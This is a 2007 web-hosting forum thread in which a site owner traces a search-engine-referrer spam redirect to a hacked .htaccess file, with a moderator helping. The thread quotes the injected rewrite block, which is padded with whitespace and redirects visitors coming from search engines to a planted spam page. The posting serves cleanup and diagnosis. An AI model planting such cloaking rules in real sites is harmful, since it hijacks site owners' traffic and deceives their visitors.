Web Hosting Forum | Lunarpages
News: Server Migrations to San Diego: Deneb, Felix and Tsohea are moving to San Diego starting Tuesday, December 30, 2008 at 10pm Pacific. They will complete their moves Friday night, January 2, 2009

Isis, Seth and Ez-web-n-mail will move physically on Friday, January 2, 2009

Please see the forum posts at http://www.lunarforums.com/lunarpages_web_hosting_server_information-b54.0/

+ Submit Your Own Web Site for the January 2009 Site of the Month Contest!
 
Home Help Search Calendar Login Register
*
Welcome, Guest. Please login or register.
Did you miss your activation email? 		January 07, 2009, 06:57:54 PM


Login with username, password and session length


Web Hosting Forum | Lunarpages > Lunarpages Web Hosting - Advanced Assistance > Lunarpages - Web Hosting, Email & PC Security > Strange Google Referrer Website Hack, need help.
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Strange Google Referrer Website Hack, need help.  (Read 1068 times)
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« on: October 30, 2007, 11:40:47 AM »
Hi Everyone,
I already got my Lunarpages account suspended once and I do not want to get it suspended again, but I do not know how to solve this problem:
A few weeks ago I got an email from an anonymous person saying that my site has spam on it. I checked and sure enough they were right. I removed it but the files reappeared and I got suspended on Lunarpages.
Lunarpages was kind enough to unsuspend me and let me delete the files.
Now, I thought that deleting the files would help, but I was wrong.
When you go to my website normally http://www.yosstek.com, it shows my normal blue/green page with a flash animation. However, if you search "yosstek" in google and click on the link to my site, the spam page shows up!
I have no idea how they did it but the hackers/spammers managed to modify my site so that if google is the referrer than it shows the spam page. I am baffled as to how to fix the problem!
Does anyone know what I can do at all?
Logged
Mitch
Lunarpages Traffic Cop
Senior Moderator
Berserker Poster
*****
Offline Offline

Posts: 8934



WWW
« Reply #1 on: October 30, 2007, 11:45:34 AM »
Is the spam page a Blogger blog?  That is what shows up when you go to your domain /index.php.  I would check your .htaccess file and look for any oddball redirects that might be in there.  Also make sure that it is CHMODed to 644. 
Logged
Foolish Mitch the Moderator

+ Important Threads and Posts: Read This Before Posting! | Lunarforums Rules!
+ Lunarforums Fun: Submit Your URL to or Vote for the Site of the Month!

Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« Reply #2 on: October 30, 2007, 11:52:41 AM »
Yes, that is the page that shows up, but it is a fake blogger page.
Which .htaccess should I check, just on the main directory or in every single one?
Thank you Very Happy
« Last Edit: October 30, 2007, 11:57:27 AM by yosstek » Logged
Mitch
Lunarpages Traffic Cop
Senior Moderator
Berserker Poster
*****
Offline Offline

Posts: 8934



WWW
« Reply #3 on: October 30, 2007, 12:03:07 PM »
I would check 'em all just to be safe, also might be time to change your passwords and logins as well.  Good luck hunting this down.  Looks like whomever did it was trying to steal any of your traffic via Google.
« Last Edit: October 30, 2007, 12:06:16 PM by Mitch » Logged
Foolish Mitch the Moderator

+ Important Threads and Posts: Read This Before Posting! | Lunarforums Rules!
+ Lunarforums Fun: Submit Your URL to or Vote for the Site of the Month!

Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« Reply #4 on: October 30, 2007, 12:08:32 PM »
Whoa!
I check the .htaccess at first and I got nothing but this:

Code:
ErrorDocument 404 /404.shtml

Options All -Indexes

But then I visited my website, chmod-ed everything to 644 and got this:
Code:
ErrorDocument 404 /404.shtml

# a0b4df006e02184c60dbf503e71c87ad                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteEngine On                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteCond %{TIME_SEC} <54                                                                                                                                                                                                       
                                                                                                                                                                                                        RewriteRule ^.*$ /ganizzyextremeblog/wp-content/themes/default/iqexepo/t.htm [L]                                                                                                                                                                                                       
                                                                                                                                                                                                        # a995d2cc661fa72452472e9554b5520c         
Options All -Indexes

Thank you very much!
I wonder if they used a wordpress exploit for thatg, because the blog is wordpress and it looks like that's where they were place the trojan files....
Logged
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« Reply #5 on: October 30, 2007, 12:10:10 PM »
Sorry, one more thing.
When I put chmod 644 on my site it doesn't allow access.
It says:
Forbidden
You don't have permission to access / on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
Logged
Mitch
Lunarpages Traffic Cop
Senior Moderator
Berserker Poster
*****
Offline Offline

Posts: 8934



WWW
« Reply #6 on: October 30, 2007, 12:15:55 PM »
Yep I saw that, at least your not getting the spam any longer.  Clapping

When somebody types in your domain, how is your web site setup to show your domain?  Is your actual web site in index.php or is it in a subfolder?  You might need to set that up again if it got messed up when clearing out your public_html's .htaccess file.
Logged
Foolish Mitch the Moderator

+ Important Threads and Posts: Read This Before Posting! | Lunarforums Rules!
+ Lunarforums Fun: Submit Your URL to or Vote for the Site of the Month!

Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« Reply #7 on: October 30, 2007, 12:28:18 PM »
My website is set to go to my index.php file, I believe.
Well, I set the chmod to 755 on all my files in "public_html" and I also set "public_html" to 755. Will that be ok?
Logged
Mitch
Lunarpages Traffic Cop
Senior Moderator
Berserker Poster
*****
Offline Offline

Posts: 8934



WWW
« Reply #8 on: October 30, 2007, 12:30:49 PM »
Yep, looks like you got it fixed.   Thumbs Up
Logged
Foolish Mitch the Moderator

+ Important Threads and Posts: Read This Before Posting! | Lunarforums Rules!
+ Lunarforums Fun: Submit Your URL to or Vote for the Site of the Month!

Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !
yosstek
Space Explorer
***
Offline Offline

Posts: 6
« Reply #9 on: October 30, 2007, 12:32:13 PM »
Thanks again, Mitch  Smiling
Logged
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC

Valid XHTML 1.0! Valid CSS! Dilber MC Theme by HarzeM